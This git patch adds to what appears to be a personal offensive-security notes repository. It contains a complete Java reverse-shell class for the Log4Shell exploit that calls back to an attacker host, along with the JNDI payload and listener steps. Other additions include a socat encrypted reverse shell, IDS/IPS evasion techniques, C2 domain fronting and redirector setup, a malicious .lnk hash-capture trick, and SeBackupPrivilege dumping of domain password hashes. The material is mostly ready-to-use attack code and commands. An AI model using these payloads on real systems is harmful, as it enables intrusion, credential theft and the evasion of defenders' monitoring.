From a3a6f09472bdcae1d9777e9a73f10df0d7bc6ed7 Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 10 Mar 2022 01:31:54 +0100 Subject: [PATCH] bump --- .gitmodules | 21 +++++ enumeration/docs/ldap.md | 15 ++++ .../network_scanners/kotlin-port-scanner | 1 + exfiltration/windows/evil-winrm.md | 5 ++ exploit/java/log4shell.md | 44 ++++++++++- .../CVE-2022-0847-dirty-pipe-exploit | 1 + exploit/macOS/DS_Store_crawler_parser | 1 + exploit/macOS/Python-dsstore | 1 + exploit/macOS/ds_store_exp | 1 + exploit/windows/docs/lnk_exploit.md | 14 ++++ misc/hadoop.md | 57 +++++++++++++ misc/level3_hypervisor/docker_sec/docker.md | 15 +++- pivoting.md | 4 + post_exploitation/armitage | 1 + post_exploitation/docs/c2.md | 41 ++++++++++ post_exploitation/docs/ids_ips_evation.md | 79 +++++++++++++++++++ post_exploitation/docs/metasploit.md | 30 +++++++ .../docs/windows/sebackupprivilege.md | 8 +- post_exploitation/powershell | 1 + 19 files changed, 333 insertions(+), 7 deletions(-) create mode 100644 enumeration/docs/ldap.md create mode 160000 enumeration/network_scanners/kotlin-port-scanner create mode 160000 exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit create mode 160000 exploit/macOS/DS_Store_crawler_parser create mode 160000 exploit/macOS/Python-dsstore create mode 160000 exploit/macOS/ds_store_exp create mode 100644 exploit/windows/docs/lnk_exploit.md create mode 100644 misc/hadoop.md create mode 160000 post_exploitation/armitage create mode 100644 post_exploitation/docs/ids_ips_evation.md create mode 160000 post_exploitation/powershell diff --git a/.gitmodules b/.gitmodules index 06838ac..be02fd9 100644 --- a/.gitmodules +++ b/.gitmodules @@ -139,3 +139,24 @@ [submodule "exploit/windows/printspoofer"] path = exploit/windows/printspoofer url = https://github.com/dievus/printspoofer.git +[submodule "post_exploitation/powershell"] + path = post_exploitation/powershell + url = https://github.com/puckiestyle/powershell.git +[submodule "enumeration/network_scanners/kotlin-port-scanner"] + path = enumeration/network_scanners/kotlin-port-scanner + url = https://github.com/Hydragyrum/kotlin-port-scanner.git +[submodule "exploit/macOS/ds_store_exp"] + path = exploit/macOS/ds_store_exp + url = https://github.com/lijiejie/ds_store_exp.git +[submodule "exploit/macOS/DS_Store_crawler_parser"] + path = exploit/macOS/DS_Store_crawler_parser + url = https://github.com/anantshri/DS_Store_crawler_parser.git +[submodule "exploit/macOS/Python-dsstore"] + path = exploit/macOS/Python-dsstore + url = https://github.com/gehaxelt/Python-dsstore.git +[submodule "post_exploitation/armitage"] + path = post_exploitation/armitage + url = https://gitlab.com/kalilinux/packages/armitage.git +[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"] + path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit + url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git diff --git a/enumeration/docs/ldap.md b/enumeration/docs/ldap.md new file mode 100644 index 0000000..97959c3 --- /dev/null +++ b/enumeration/docs/ldap.md @@ -0,0 +1,15 @@ +# LDAP + +## Get Domain + +```sh + ldapsearch -x -h $TARGET_IP -s base namingcontexts +``` + +## Domain Dump + +* If a set of credentials are known via +```sh +ldapdomaindump $TARGET_IP -u '\' -p '' --no-json --no-grep +``` +* Take a look at the genreated HTML files diff --git a/enumeration/network_scanners/kotlin-port-scanner b/enumeration/network_scanners/kotlin-port-scanner new file mode 160000 index 0000000..54bfab4 --- /dev/null +++ b/enumeration/network_scanners/kotlin-port-scanner @@ -0,0 +1 @@ +Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e diff --git a/exfiltration/windows/evil-winrm.md b/exfiltration/windows/evil-winrm.md index 1d7988d..80f288d 100644 --- a/exfiltration/windows/evil-winrm.md +++ b/exfiltration/windows/evil-winrm.md @@ -1,6 +1,11 @@ # Evil-winrm + * Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp` ```sh download C:\Windows\Temp\ ``` +* The other way +``` +upload yadayda +``` diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md index 87f8e99..9768e5e 100644 --- a/exploit/java/log4shell.md +++ b/exploit/java/log4shell.md @@ -37,7 +37,7 @@ X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo} * A Proxy LDAP server to an HTTP server is needed * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class -```sh +```java public class Exploit { static { try { @@ -48,12 +48,52 @@ public class Exploit { } } ``` +or another one +```java +import java.io.InputStream; +import java.io.OutputStream; +import java.net.Socket; + +public class Exploit { + static { + String host = "$ATTACKER_IP"; + int port = 4711; + String cmd = "/bin/sh"; + try { + Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); + Socket s = new Socket(host, port); + InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); + OutputStream po = p.getOutputStream(), so = s.getOutputStream(); + while (!s.isClosed()) { + while (pi.available() > 0) + so.write(pi.read()); + while (pe.available() > 0) + so.write(pe.read()); + while (si.available() > 0) + po.write(si.read()); + so.flush(); + po.flush(); + Thread.sleep(50); + try { + p.exitValue(); + break; + } catch (Exception e) { + } + } + p.destroy(); + s.close(); + } catch (Exception e) { + } + } +} +``` + * Run the LDAP, HTTP and reverse shell ```sh java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit" ``` ```sh -php -S 0.0.0.:8000 +php -S 0.0.0.0:8000 ``` ```sh nc -lvnp 4449 diff --git a/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit b/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit new file mode 160000 index 0000000..e1fd1f6 --- /dev/null +++ b/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit @@ -0,0 +1 @@ +Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330 diff --git a/exploit/macOS/DS_Store_crawler_parser b/exploit/macOS/DS_Store_crawler_parser new file mode 160000 index 0000000..9e003a3 --- /dev/null +++ b/exploit/macOS/DS_Store_crawler_parser @@ -0,0 +1 @@ +Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be diff --git a/exploit/macOS/Python-dsstore b/exploit/macOS/Python-dsstore new file mode 160000 index 0000000..859781b --- /dev/null +++ b/exploit/macOS/Python-dsstore @@ -0,0 +1 @@ +Subproject commit 859781b834244774cb509e96ccc29ee646f72739 diff --git a/exploit/macOS/ds_store_exp b/exploit/macOS/ds_store_exp new file mode 160000 index 0000000..784eada --- /dev/null +++ b/exploit/macOS/ds_store_exp @@ -0,0 +1 @@ +Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7 diff --git a/exploit/windows/docs/lnk_exploit.md b/exploit/windows/docs/lnk_exploit.md new file mode 100644 index 0000000..6addcb0 --- /dev/null +++ b/exploit/windows/docs/lnk_exploit.md @@ -0,0 +1,14 @@ +# .lnk exploit + +* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html) +* [mamachine's tool](http://mamachine.org/mslink/index.en.html) + +* Target does not even have to open the link directly + +```sh +mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk +``` +* Start a responder and wait for user's hash +```sh +responder -I eth0 +``` diff --git a/misc/hadoop.md b/misc/hadoop.md new file mode 100644 index 0000000..cd9a950 --- /dev/null +++ b/misc/hadoop.md @@ -0,0 +1,57 @@ +# Hadoop + +Distributed storage and computing +* [Hadoop Attack Libs](https://github.com/wavestone-cdt/hadoop-attack-library.git) + +## Terminology +* __Cluster__, forms the datalake +* __Node__, single host inside the cluster +* __NameNode__, node that keeps the dir tree of the Hadoop file system +* __DataNode__, slave node that stores files and is instructed by the NameNode +* __Primary NameNode__, current active node responsible for keeping the directory structure +* __Secondary NameNode__, hot standby for Primary NameNode. There may be multiple on standby inside the cluster +* __Master Node__, Hadoop management app like HDFS or YARN Manager +* __Slave Node__, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time +* __Edge Node__, hosting Hadoop user app like Zeppelin or Hue +* __Kerberised__, security enabled cluster through Kerberos + +* __HDFS__, Hadoop Distributed File System, storage device for unstructured data +* __Hive__, primary DB for structured data +* __YARN__, scheduling jobs and resource management +* __MapReduce__, distributed filtering, sorting and reducing +* __HUE__, GUI for HDFS and Hive +* __Zookeeper__, cluster management +* __Kafka__, message broker +* __Ranger__, privileged ACL +* __Zeppelin__, data analytivs inside a webUI + +## Zeppelin + +* Try [default logins](https://zeppelin.apache.org/docs/0.8.2/setup/security/shiro_authentication.html#4-login) +* Try execution inside notebooks + +## Ktabs + +* Finding `ktpass`es to authenticate at the kerberos TGS +* Output principals and use them to init +```sh +klist -k +kinit -k -V -t +``` + +## HDFS + +* User the `hdfs` utility to enumerate the distributed network storage +```sh +hdfs dfs -ls / +``` +* Current user and user on the storage do not have to correspond +* Touched files on the storage may be owned by root +```sh +hdfs dfs -touchz testfile /tmp/testfile +hdfs dfs -ls /tmp +``` +* Impersonate by sourcing keytab file of the user, __NodeManager__ is the highest user in regards to permission + + + diff --git a/misc/level3_hypervisor/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md index f1cc794..6612c62 100644 --- a/misc/level3_hypervisor/docker_sec/docker.md +++ b/misc/level3_hypervisor/docker_sec/docker.md @@ -125,7 +125,20 @@ curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.s ```sh curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers//start ``` -* Login in to the host via ssh +* Login in to the host via ssh remotely or socat locally +```sh +socat - UNIX-CONNECT:/var/run/docker.sock +POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 +Host: +Connection: Upgrade +Upgrade: tcp + +HTTP/1.1 101 UPGRADED +Content-Type: application/vnd.docker.raw-stream +Connection: Upgrade +Upgrade: tcp +``` + ## Escape through DB * Login into DB diff --git a/pivoting.md b/pivoting.md index 1cb613e..7c9257b 100644 --- a/pivoting.md +++ b/pivoting.md @@ -60,6 +60,10 @@ cmd.exe /c echo y | .\plink.exe -R :: @ -o key.ppk ``` +* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d) +```sh +echo y | &.\plink.exe -ssh -l -pw -R ::127.0.0.1: +``` ### Socat * Reverse shell on target via diff --git a/post_exploitation/armitage b/post_exploitation/armitage new file mode 160000 index 0000000..d07b022 --- /dev/null +++ b/post_exploitation/armitage @@ -0,0 +1 @@ +Subproject commit d07b0227e9ba0dc6de0c688a44ed17803c5216c6 diff --git a/post_exploitation/docs/c2.md b/post_exploitation/docs/c2.md index 980ecdf..4b43462 100644 --- a/post_exploitation/docs/c2.md +++ b/post_exploitation/docs/c2.md @@ -2,3 +2,44 @@ * [Matrix](https://www.thec2matrix.com/) * [bcsecurity](https://www.bc-security.org/) maintains Empire 4 +* [Empire](https://github.com/BC-SECURITY/Empire.git) +* [Armitage](https://gitlab.com/kalilinux/packages/armitage.git) +* [Covenant](https://github.com/cobbr/Covenant) +* [Sliver](https://github.com/BishopFox/sliver) + +* Server + * Listener +* Payloads/Agents + * Staged/Dropper + * Stageless +* Beacons from Agents, disguised through jitter +* Modules + * Post Exploitation + * Pivoting + +## Domain Fronting + +* Use a Domain on the C2 server +* User Cloudflare to proxy the request and responses to and from the target +* Use HTTPs for channel encryption + +## Profiles + +* Server evaluates by custom user-agents to identify agents + +## Types + +* Std listener, TCP or UDP +* HTTP/HTTPS, counter FW +* DNS, if internet access of the target is flaky +* SMB, counter network segments + +## Redirector + +* Apache or nginx as reverse proxy in front of the c2 server +* FW is still needed in front of the redirector +* These get burned instead of the c2 + + + + diff --git a/post_exploitation/docs/ids_ips_evation.md b/post_exploitation/docs/ids_ips_evation.md new file mode 100644 index 0000000..4365a8c --- /dev/null +++ b/post_exploitation/docs/ids_ips_evation.md @@ -0,0 +1,79 @@ +# IDS & IPS Evation + +* Evation by manipulation of + * Protocol + * Payload + * Route + * Or DoS + +## Protocol Manipulation + +### Relying on another protocol +* `nc -ulvnp 4711` for listening to incoming UDP traffic +* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP + +### Manipulation of the source's or LHOST's network port +* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it + +### Session splicing by fragmentation and segmentation +* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu ` for MTU +* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag ` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP` + +### Sending invalid packets +* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN` +* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R` + +## Payload Manipulation + +### Obfuscation and Encoding +* Base64 +* URL +* Escaped Unicode Characters + +### Encrypting Communication Channels +* Use socat with encryption +```sh +openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt +``` +* Create `.pem` (Privacy Enhanced Mail) file via +``` +cat id_rsa.key reverse.crt > reverse.pem +``` +* Listening on attacker side +```sh +socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT +``` +* On target +```sh +socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash +``` + +### Modification of Data +* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl` +* Adding whitespaces to the commands +* Use aliases + +## Route Manipulation + +### Relying on Source Routing +* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely +* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly + +### Using Proxyy Servers +* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP` + +## Tactical DoS +* Non malicious, benign traffic against + * IDS/IPS + * Logging server + +## MISC + +* Changing + * `User-Agent` + * Request frequency and duration of sleep + * SSL/TLS certs + * DNS beacon, storing exfiltrated data in the query + + + diff --git a/post_exploitation/docs/metasploit.md b/post_exploitation/docs/metasploit.md index 5de49ff..0c09c75 100644 --- a/post_exploitation/docs/metasploit.md +++ b/post_exploitation/docs/metasploit.md @@ -58,3 +58,33 @@ set PAYLOAD windows/meterpreter/reverse_http run -j ``` * Copy into powershell/cmd + + +## Reverse Proxy + +* Hide behind reverse proxy, e.g. apache +* In case of an apache, these modules must be enabled + * rewrite + * proxy + * proxy_http + * headers +* Use `User-Agent` to identify targets +```ucl + + + ServerAdmin webmaster@localhost + DocumentRoot /var/www/html + + RewriteEngine On + RewriteCond %{HTTP_USER_AGENT} "^User-Agent$" + ProxyPass "/" "http://localhost:8080/" + + + AllowOverride All + + + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined + + +``` diff --git a/post_exploitation/docs/windows/sebackupprivilege.md b/post_exploitation/docs/windows/sebackupprivilege.md index b8f6537..8bace4b 100644 --- a/post_exploitation/docs/windows/sebackupprivilege.md +++ b/post_exploitation/docs/windows/sebackupprivilege.md @@ -6,21 +6,21 @@ * Check `whoami /all` * `SeBackupPrivilege` must be present * [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary) -* Upload `diskshadow.txt` to the target with the following content +* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!! ```sh set metadata C:\tmp\tmp.cabs set context persistent nowriters add volume c: alias someAlias create -expose %someAlias% h: +expose %someAlias% h: ``` -* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt` +* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt` * Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target ```sh import-module .\SeBackupPrivilegeUtils.dll import-module .\SeBackupPrivilegeCmdLets.dll copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite -reg save HKLM\SYSTEM C:\Path\to\uploads\system +reg save HKLM\SYSTEM C:\tmp\system ``` * Downloads the files `ntds.dit` and `system` * Extract the hashes via diff --git a/post_exploitation/powershell b/post_exploitation/powershell new file mode 160000 index 0000000..81e5fba --- /dev/null +++ b/post_exploitation/powershell @@ -0,0 +1 @@ +Subproject commit 81e5fba23f24fb74eaabeeb8665c9f9dff4c535b